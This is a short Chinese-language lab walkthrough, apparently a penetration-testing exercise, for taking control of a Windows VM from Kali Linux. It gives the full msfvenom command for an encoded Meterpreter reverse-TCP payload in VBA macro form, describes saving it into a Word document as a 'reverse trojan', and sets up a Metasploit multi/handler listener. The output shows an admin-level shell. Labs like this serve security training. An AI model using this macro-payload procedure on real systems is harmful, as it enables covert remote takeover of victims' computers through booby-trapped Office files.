實驗環境:Windows虛拟機一台IP位址為192.168.230.4,需安裝office,kali Linux虛拟機一台,IP位址192.168.230.10
實驗目的:拿下Windows控制權
實驗步驟:
一,部署實驗環境
1,Windows安裝word,配置IP位址

二,使用kali生成payload
1,打開msf生成payload
指令行輸入msfconsole也可以打開
msf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.10 LPORT=4444 -a x86 --platform windows-e x86/shikata_ga_nai -i 5 -f vba-exe 生成payload,-p指定payload,LHOST指定本機IP位址作為監聽,LPORT為本機監聽端口,-a架構 x86架構,--platform平台為Windows,-e指定編碼器
打開宏檔案
另存為反彈木馬
2,進行監聽
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 設定payload
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.230.10 設定監聽IP位址
LHOST => 192.168.230.10
msf6 exploit(multi/handler) > set LPORT 4444 監聽端口
LPORT => 4444
msf6 exploit(multi/handler) > run 運作監聽器
擷取到shell
meterpreter > getuid 檢視目前使用者,已經擷取到管理者權限
Server username: DESKTOP-QU8DCA3\admin
【至此,實驗完成】